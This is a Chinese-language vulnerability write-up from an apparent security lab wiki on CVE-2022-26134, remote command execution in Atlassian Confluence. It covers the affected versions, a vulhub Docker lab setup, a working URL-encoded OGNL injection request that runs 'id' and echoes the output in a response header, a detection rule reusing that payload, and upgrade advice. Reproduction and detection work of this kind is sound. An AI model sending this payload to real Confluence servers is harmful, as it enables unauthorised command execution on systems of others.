CVE-2022-26134 Confluence远程命-漏洞文库小世界-安全文库-NGC660 安全实验室

CVE-2022-26134 Confluence远程命

0x01 漏洞描述

Atlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。

0x02 漏洞影响范围

Confluence Server&Data Center ≥ 1.3.0

Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1

0x03 漏洞利用条件

利用条件:无

0x04漏洞复现

新建一个docker-compose.yml,内容如下

version: '2'
services:
  web:
    image: vulhub/confluence:7.13.6
    ports:
      - "8090:8090"
    depends_on:
      - db
  db:
    image: postgres:12.8-alpine
    environment: 
    - POSTGRES_PASSWORD=postgres
    - POSTGRES_DB=confluence

docker-compose up -d 等完成后访问

http://your-ip:8090/

m_946e5038e57a5a14929000cf63203054_r

这里打开后需要注册,(直接next然后去官网申请免费key)

m_b0cfadb58080a4ac3b18b503177c800b_r

等一切完成后主界面是这样的

m_b7a154c8c30990b02db0430a68392133_r

poc数据包:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 172.16.100.53:8090
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

直接可以执行命令。

m_a6b8203c48c808b6c3ec34508f407e2c_r

0x05检测poc规则编写

params: []
name: CVE-2022-26134 Confluence远程命令执行漏洞
set: {}
rules:
- method: GET
  path: /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: 'response.status == 302 '
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

m_bf7863f9048835d8e97668c398d1fbf8_r

0x06漏洞修复

当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。

0x07 参考

https://www.pudn.com/news/62a3f9dbb21f6919440622cc.html

请登录后发表评论

    请登录后查看回复内容